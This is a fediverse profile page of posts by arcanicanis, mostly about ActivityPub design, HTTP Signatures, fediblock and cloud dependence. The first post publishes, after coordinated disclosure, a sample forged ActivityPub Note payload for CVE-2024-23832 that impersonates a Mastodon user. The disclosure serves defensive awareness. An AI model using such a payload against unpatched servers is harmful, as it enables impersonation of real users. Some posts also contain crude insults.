GNU social JP
  • FAQ
  • Login
GNU social JPは日本のGNU socialサーバーです。
Usage/ToS/admin/test/Pleroma FE
  • Public

    • Public
    • Network
    • Groups
    • Featured
    • Popular
    • People

Notices by arcanicanis (arcanicanis@were.social), page 3

  1. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Friday, 16-Feb-2024 01:19:14 JST arcanicanis arcanicanis

    So here’s an example of one of the maliciously-crafted payloads that resulted in a 9.8 severity CVE (CVE-2024-23832) against Mastodon:

    { "@context": ["https://www.w3.org/ns/activitystreams"], "id": "https://mastodon.social/users/Gargron/posts/123456", "type": "Note", "actor": "https://mastodon.social/users/Gargron", "attributedTo": "https://mastodon.social/users/Gargron", "content": "Well, this is an extremely concerning vulnerability I should have accounted for.", "to": [ "https://www.w3.org/ns/activitystreams#Public" ], "cc": [ "https://mastodon.social/users/Gargron/followers" ], "published": "2024-01-28T22:00:00Z" }

    I have previously double-checked with one of the Mastodon developers (while CC’ing the Mastodon Security email) to confirm that I’m free to release the details at this scheduled time (Feb 15th 15:00 UTC). According to the current observed metrics on FediDB, >73.6% of Mastodon instances are patched against CVE-2024-23832, as manually tabulated.

    For more details on the vulnerability, the original security report as it was submitted on Github is available at: https://arcanican.is/excerpts/cve-2024-23832/

    My recount of events (as well as unsolicited commentary and criticisms on the vulnerability, ecosystem, etc; when I get around to finishing it): https://arcanican.is/excerpts/cve-2024-23832/discovery.htm

    In conversation about a year ago from were.social permalink

    Attachments



    1. Domain not in remote thumbnail source whitelist: files.mastodon.social
      Eugen ? (@Gargron@mastodon.social)
      72.7K Posts, 320 Following, 211K Followers · Founder, CEO and lead developer @Mastodon, Germany.

    2. https://were.social/media/6ff54bdc52e5011feb9b11a715a0e4206060a10b523d864814345a3fc7f9734c.png

    3. https://were.social/media/c0bf24a97dec84fbbc9c22244334160c7b056d29b03ab180bae6d2bb57455441.png

    4. Domain not in remote thumbnail source whitelist: files.mastodon.social
      Mastodon
      76.1K Posts, 512 Following, 344K Followers · Founder of @Mastodon. Film photography, prog metal, Dota 2.

    5. No result found on File_thumbnail lookup.
      Remote User Impersonation and Takeover via Cache Poisoning
  2. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Wednesday, 14-Feb-2024 09:52:02 JST arcanicanis arcanicanis
    in reply to
    • Daemionfox

    An Accept can be as simple as (have a Follow activity as the object field):

    { "@context": [ "https://www.w3.org/ns/activitystreams" ], "type": "Accept", "actor": "https://example.social/users/subscriber", "to": [ "https://fedi.example/users/poster" ], "object": { "type": "Follow", "actor": "https://fedi.example/users/poster", "object": "https://example.social/users/subscriber" } }

    For the best case, you can just copy the whole Follow activity into the ‘object’ field; meanwhile just referencing the activity ID of the Follow alone would be insufficient.

    In conversation about a year ago from were.social permalink

    Attachments




  3. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Wednesday, 14-Feb-2024 07:40:31 JST arcanicanis arcanicanis
    in reply to
    • Alex Gleason
    • PC-9801 Enjoyer
    • Sprate

    What I’m more curious of is someone reimplementing the whole stack on their own, from the provided documentation only, and not just copycating undocumented behavior from source code of the sample implementation. I don’t consider anything an open standard until there’s at least two independent [client and server] implementations of it.

    In conversation about a year ago from were.social permalink
  4. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Wednesday, 14-Feb-2024 06:19:46 JST arcanicanis arcanicanis
    in reply to
    • 
    • PC-9801 Enjoyer
    • :blank:
    • Lexxy 🦊

    https://www.w3.org/TR/activitypub/#block-activity-outbox

    The Block activity is used to indicate that the posting actor does not want another actor (defined in the object property) to be able to interact with objects posted by the actor posting the Block activity.

    In the ActivityPub spec itself, it bears no meaning of access control; it’s purely just to ignore notifications and objects (such as replies) from that actor, as there is no rational way to accomplish limiting access to public posts from specific actors.

    Anything sensitive that requires access control should not be posted publicly on social media to begin with. This isn’t a software design issue, it’s a human behavioral issue.

    I routinely [privately] warn people about oversharing, such as when I stumble across someone posting a photo that gives away the exact location of where they live, or where they work, and most of the time it’s shrugged off as a non-issue, because they assume they have no tangible threats in the present, but never consider the future.

    Then of course, they could always end up in some controversy much later on, over something completely innocuous, and face some tangible threats/risk, but yet put the blame on everyone else for their reckless posting behaviors (“omg doxxing!”). Blocking people they perceive as a threat solves nothing.

    In conversation about a year ago from were.social permalink

    Attachments

    1. Domain not in remote thumbnail source whitelist: www.w3.org
      ActivityPub
      The ActivityPub protocol is a decentralized social networking protocol based upon the [ActivityStreams] 2.0 data format. It provides a client to server API for creating, updating and deleting content, as well as a federated server to server API for delivering notifications and content.

  5. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Tuesday, 13-Feb-2024 01:42:33 JST arcanicanis arcanicanis
    in reply to
    • Hyolobrika
    • :verified_2:防空識別區𝒔𝒐𝒄𝟶

    The reason I think ‘federated’ has much more practicality, is because it’s far easier to conceptualize, establish responsibility of who pays the bills for running the servers, easier to locate a resource (if it uses some conventional identifier, like a URL), etc.

    Whereas with “truly decentralized mesh, everything is a node, no distinction of client/server”: usually some entity still has to pick up the slack and host high-bandwidth/high-uptime nodes, or seed a sizable portion of the network (if storage focused), or centrally run some ‘jumpstart’ servers (to be a new node’s first peer, to discover the rest of the network to peer with) for the network, entirely as some cash-furnace charity.

    As it is with Tor, I have no idea where it’d be if it was without a few of it’s top exit node providers, since there’s virtually no incentive to ever host an exit node: https://metrics.torproject.org/bubbles.html#as-exits-only

    The only model that I think anything ‘truly decentralized’ would be self-sustaining is if it involves some autonomous cryptocurrency-based concept, but that also adds more cost and overhead (including blockchain, consensus, etc), and I assume also difficult to design a system that provably measures resource costs (such as rewarding someone for hosting a resource, providing bandwidth, etc).

    It feels like everyone always tiers the concepts strictly into (from worst to inherently best): centralized, federated, decentralized mesh; always striving decentralized mesh as ‘the Holy Grail’, always better above-all. It’s seldom viewed instead where there’s tradeoffs between federated and decentralized.

    Also instead of having to combine decentralization all into one application protocol, sometimes it’s better just being left as an external responsibility of an underlying network; in other words, just take what we already have, and combine them together: host a single-user fedi instance on Tor, I2P, or some other overlay encrypted meshnet, and you get some of the bonuses without having to invent a whole new protocol and whole new suite of cross-platform client/node software (which can take YEARS to iron out).

    In conversation about a year ago from were.social permalink

    Attachments


    1. Domain not in remote thumbnail source whitelist: metrics.torproject.org
      Servers – Tor Metrics
  6. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Monday, 12-Feb-2024 21:51:02 JST arcanicanis arcanicanis
    in reply to
    • Alex Gleason

    The reality that disgusts me the most, is with the cargo culted mentality of:

    Software is now (rightfully) considered so dangerous that we tell everyone not to run it themselves. Instead, you are supposed to leave that to an “X as a service” provider, or perhaps just to “the cloud.” (…)

    The assumption is then that the cloud is somehow able to make insecure software trustworthy. (…)

    Specifically where you have retards that made the mistake of running their company IT almost exclusively on Microsoft products, especially with Exchange, SharePoint, and such; that they figure it’s “safer” if you just have Microsoft host all of it instead. Instead of: just using something else, with a better security history.

    It even blows my mind further with teleconferencing software; like paying an O365 subscription for Teams, as if WebRTC is a finite resource you can only get from Microsoft and can’t run yourself.

    So now a lot of it’s just a capture of so much internal company data and infra all onto Azure/O365, making all these customers as Microsoft’s most favorite little captive victims.

    Hell, even the f’ing military (when I was in my last few months of doing ActiveDirectory/Exchange admin stuff in the Marine Corps, to the end of my contract) was in the transition of dumping all their internal servers for Exchange Online and O365, whereas all of that’s outside of the intranet perimeter now.

    In conversation about a year ago from were.social permalink

    Attachments

    1. No result found on File_thumbnail lookup.
      yourself.so - このウェブサイトは販売用です! - Employee benefits リソースおよび情報
      このウェブサイトは販売用です! yourself.so は、あなたがお探しの情報の全ての最新かつ最適なソースです。一般トピックからここから検索できる内容は、yourself.soが全てとなります。あなたがお探しの内容が見つかることを願っています!
    2. Domain not in remote thumbnail source whitelist: history.It
      HISTORY.IT
  7. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Monday, 12-Feb-2024 14:07:47 JST arcanicanis arcanicanis

    https://spectrum.ieee.org/lean-software-development

    In conversation about a year ago from were.social permalink

    Attachments

    1. Domain not in remote thumbnail source whitelist: spectrum.ieee.org
      Why Bloat Is Still Software’s Biggest Vulnerability
      from https://www.facebook.com/48576411181
      A 2024 plea for lean software
  8. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Sunday, 11-Feb-2024 18:44:16 JST arcanicanis arcanicanis
    in reply to
    • Alex Gleason
    • Matt Hamilton

    I mean, HTTP Signatures wasn’t very hard to implement and get working fine and interoperable with other fedi software, and I’ve read portions of the [draft] spec, it’s just not anything usable as a format of portable data that could be relayed between servers. You just also have to check with implementations of what headers they expect to be signed, which is part of the unwritten rules in fedi that you’re not going to find in the HTTP Signatures spec itself.

    But if you want to find endless rabbit holes of practically “protocol mills” (if that’s an appropriate moniker?), just dig into some of the distant depths of the Verifiable Credentials suite of standards, or for insane extremes, go through the labyrinth of specs for Solid: https://solidproject.org/TR/

    Apparently they even define their own system of HTTP Signatures: https://solid.github.io/httpsig/

    depend on the N3 language for manipulating data: https://solidproject.org/TR/protocol#n3-patch-example

    https://w3c.github.io/N3/spec/

    But outside of the topic of Solid, and as mentioned earlier: at least some parts of Verifiable Credentials can be borrowed into fedi, and narrowly implemented for a specific opinionated use, such as object signatures, as I’ve described in: https://arcanican.is/primer/ap-decentralization.php

    But yes, there’s just insane degrees and extents in which people just keep dreaming up new standards, and making things unfathomably more complex than needed, likely just to sell consultancy and to pitch more VC startups.

    In conversation about a year ago from were.social permalink

    Attachments



    1. No result found on File_thumbnail lookup.
      Solid Protocol

  9. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Sunday, 11-Feb-2024 18:21:27 JST arcanicanis arcanicanis
    in reply to
    • silverpill

    I guess I notice one typo in the proposed FEP: it’s (created) not (created-at), I hope that typo doesn’t stick.

    In conversation about a year ago from were.social permalink
  10. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Sunday, 11-Feb-2024 12:54:49 JST arcanicanis arcanicanis
    in reply to
    • Matt Hamilton

    This is with an implementation of HTTP Signatures in fedi. Just as I was looking into someone asking help on implementing HTTP Signatures, I notice the library they pull in doesn’t even validate the digest, just if the signature is valid and nothing else.

    This is also why I hate the mentality of “well, surely other people out there are more responsible and educated than me on this domain-specific knowledge, so I’ll just import this random library that seems popular enough”.

    In conversation about a year ago from were.social permalink
  11. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Sunday, 11-Feb-2024 12:45:48 JST arcanicanis arcanicanis

    Did you know: when you verify the signature on a digest, you should probably verify that the presented content (that the digest is supposedly of) actually hashes to the same value as the signed digest?

    I’m just increasingly disgusted that it seems like the majority of developers are just collectively drugged, high, intoxicated, or some combination thereof, because I don’t understand how I keep stumbling into these things when I’m not even trying to pentest anything. Worse is that this is in a library that people are just blindly importing and trusting.

    In conversation about a year ago from were.social permalink
  12. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Friday, 09-Feb-2024 21:46:01 JST arcanicanis arcanicanis

    Why do we have both context (not to be confused with @context) and conversation? Is that another Mastodonism or Pleromaism? context is defined in the ActivityStreams vocabulary specification, while conversation is not. In production implementations, they seem to just reference the same value.

    It would have been nice to just have either of those resolve to a Collection of some sort, such as containing all the objects within that context, and instead of needing another property (replies) to be a little less redundant.

    In conversation about a year ago from were.social permalink

    Attachments

    1. No result found on File_thumbnail lookup.
      value.it - このウェブサイトは販売用です! - Value リソースおよび情報
      このウェブサイトは販売用です! value.it は、あなたがお探しの情報の全ての最新かつ最適なソースです。一般トピックからここから検索できる内容は、value.itが全てとなります。あなたがお探しの内容が見つかることを願っています!
  13. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Wednesday, 07-Feb-2024 09:25:49 JST arcanicanis arcanicanis
    in reply to
    • Sexy Moon
    • 
    • p
    • p
    • silverpill

    There is an alternate proposal I have where you just wrap a DID-based variant inside of a standard AP object, using the parent object as an envelope, thus being able to support both as a transitory thing. It just makes it a bit more bloated/jank in appearance.

    Either way, I think there needs to be more people involved in the discussion, especially if there’s better ideas.

    In conversation about a year ago from were.social permalink
  14. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Wednesday, 31-Jan-2024 10:37:30 JST arcanicanis arcanicanis
    in reply to
    • william.maggos
    • ≠ Brett Stevens ≠
    • NETZSPHAERE DIES GOD LAUGHS

    I’ll throw a little fuel to the fire here: half this conversation is just invisible entirely to a reasonable portion of my followers, or even a significant amount of the fedi in general, because of fediblock antics.

    I recently even uncovered a very critical vulnerability in Mastodon a couple days ago, tried reporting it via email, didn’t have any response at least for at least 2 days, and would like to ping the respective developers on mastodon.social, but I can’t: because mastodon.social just abruptly blocked my server entirely some many months ago, without any report or warning, and I legitimately don’t know what it was over. (Sidenote: the report did finally get acknowledged and a patch is scheduled)

    And this is ironic because I’m not a very outspoken in-your-face debater, and rarely do I ever bring up partisan subjects. Because of fediblock, most people on this instance just dropped fedi entirely, or jumped to another server (and some even continue to keep server-hopping, just to inch around it). There’s one follower I believe that has jumped 5 servers now.

    The only post of mine that’s any semblance of controversial, despite trying to carefully address the subject with kid gloves and not leave room for any allusions is: https://were.social/notice/ATLhhFil4BF8VHsHNg

    The emphasis of the post is more on the subject of mental health, and the nature of information when dealing with someone in-person versus as a spectator online, and just by nature of it being about a trans person of something depicted in anything less than stellar, that it’s deemed “transphobic”. If that’s the thing to get a whole server banned (including by mastodon.social), then I don’t even know what degree of discourse can even be had. I don’t know what level of debate is even remotely possible anymore at this point, if people can’t handle sensitive subjects as these.

    In conversation about a year ago from were.social permalink

    Attachments


  15. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Wednesday, 31-Jan-2024 10:37:29 JST arcanicanis arcanicanis
    in reply to
    • william.maggos
    • arcanicanis
    • ≠ Brett Stevens ≠
    • NETZSPHAERE DIES GOD LAUGHS

    further, just because of not blocking servers at the request of people that aren’t even users of this instance, and for engaging in discussions on “problematic” servers, that I tally up 80 publicly published server rejects: https://fba.ryona.agency/?domain=were.social

    I have no account on KF, I never use KF, but just because I’ve replied to stuff on kiwifarms.cc (their fedi instance, which doesn’t even exist anymore; and not the forum that everyone keeps trying to shut down), that anyone on this server is now just globally a ‘bad person’ and ‘usual scum’ and written off entirely.

    Note that this list is only the public ones even. I’ve had connections to friends severed, where I can’t follow them anymore, because of their admin copy/pasting blocklists or just assuming I’m some insidious person just because of how broad of the types of people I’ll engage in conversation with.

    Hell, there’s also blocks just for the software used, because people have a brick up their butt over @alex, and many people cannot separate software from it’s developer, regardless of a software not being used to shove some political belief/ideology.

    There’s other instances that popped up, that I wanted to connect with more, but again: just because they used something that’s not Mastodon, such as: Misskey, Pleroma/Rebased (and/or Soapbox as a frontend) they started to face the absurdity of fediblock and just gave up. One of them was packetloss.social and that just disappeared entirely.

    In conversation about a year ago from were.social permalink

    Attachments


    1. No result found on File_thumbnail lookup.
      fedi-block-api were.socialI
  16. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Wednesday, 24-Jan-2024 02:09:06 JST arcanicanis arcanicanis

    “Enshittification” aka “I’m a moron that took the ‘always free’ bait of a VC startup, and act surprised every time when a service has to stop being a firepit of money, after startup funding runs out, and tries to squeeze money out of users that were expecting a perpetually free service; and instead of learning anything, I use a word to characterize platforms as being on an agenda of wanting to cripple/alienate users, and deflect responsibility for falling for the bait every time”

    In conversation about a year ago from were.social permalink
  17. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Sunday, 14-Jan-2024 13:44:47 JST arcanicanis arcanicanis
    in reply to
    • iced depresso
    • arcanicanis

    I’m almost itched by this now: the lack of time and health as being finite values, unless they’re just hidden. But nonetheless, each action should decrement a theoretical value of time. Meanwhile other poor choices could decrement health. Ergo, someone could die younger than the ‘finite amount of time’ (aka max lifetime) by poor health choices (stress, emptiness, etc).

    In conversation about a year ago from were.social permalink
  18. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Sunday, 14-Jan-2024 13:32:19 JST arcanicanis arcanicanis
    in reply to
    • iced depresso

    Guess I can’t advance beyond a teenager by focusing on working, learning, and friends (sometimes) somehow; and I guess trying to advance in career apparently makes you dumber.

    In conversation about a year ago from were.social permalink

    Attachments


    1. https://were.social/media/ab916b25a84d0836ca153c3dc0e9dd1354a5c117bf2d1d0821ef6a6713748578.png
  19. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Saturday, 13-Jan-2024 10:49:11 JST arcanicanis arcanicanis
    in reply to
    • Alex Gleason
    • silverpill

    Wait, secp256k1 (as in Koblitz curve, as used in Bitcoin/Ethereum, only meant for a specific narrow use and supposedly has much more ways to be easily misused, making key compromise easier) versus P-256 (secp256r1) or the much simpler/performant Curve25519? Was there a reason for adopting specifically secp256k1 in Nostr above all others?

    In conversation about a year ago from were.social permalink
  20. Embed this notice
    arcanicanis (arcanicanis@were.social)'s status on Wednesday, 10-Jan-2024 09:05:35 JST arcanicanis arcanicanis
    in reply to
    • Alex Gleason

    3,600,000,000 bytes / 86400 seconds (in a day) = 42kB/s, or ( * 8) 333kbps, enough for a very high bitrate audio stream.

    Semi-related: I remember once I was checking on a friend’s network for them, and in the router stats there was a device downloading like +3TB/month (and a proportionate +3TB/month upload also, from a spread of devices) of computer they don’t use for anything except watching the camera feeds on their LAN.

    Invariably it was because they used the vendor’s (Amcrest) camera viewer software and set it up via their ‘cloud login’, and already had the IP cameras linked to his account (on previous setup), that when he added the cameras to the viewer, it was pulling them by proxy of the vendor’s TURN-like relay (despite being on the exact same network).

    When they removed the cameras, and then set it up through a separate flow by scanning the LAN only, and adding them by LAN IP directly, then it wasn’t feeding their whole damn household through an internet relay (which, I checked the IP, and not even the vendor runs it, they outsource it to some other company to provide it).

    In conversation about a year ago from were.social permalink
  • After
  • Before

User actions

    arcanicanis

    arcanicanis

    Just a profusely verbose fediverse interloper

    Tags
    • (None)

    Following 0

      Followers 0

        Groups 0

          Statistics

          User ID
          10459
          Member since
          18 Sep 2022
          Notices
          265
          Daily average
          0

          Feeds

          • Atom
          • Help
          • About
          • FAQ
          • TOS
          • Privacy
          • Source
          • Version
          • Contact

          GNU social JP is a social network, courtesy of GNU social JP管理人. It runs on GNU social, version 2.0.2-dev, available under the GNU Affero General Public License.

          Creative Commons Attribution 3.0 All GNU social JP content and data are available under the Creative Commons Attribution 3.0 license.

          Embed this notice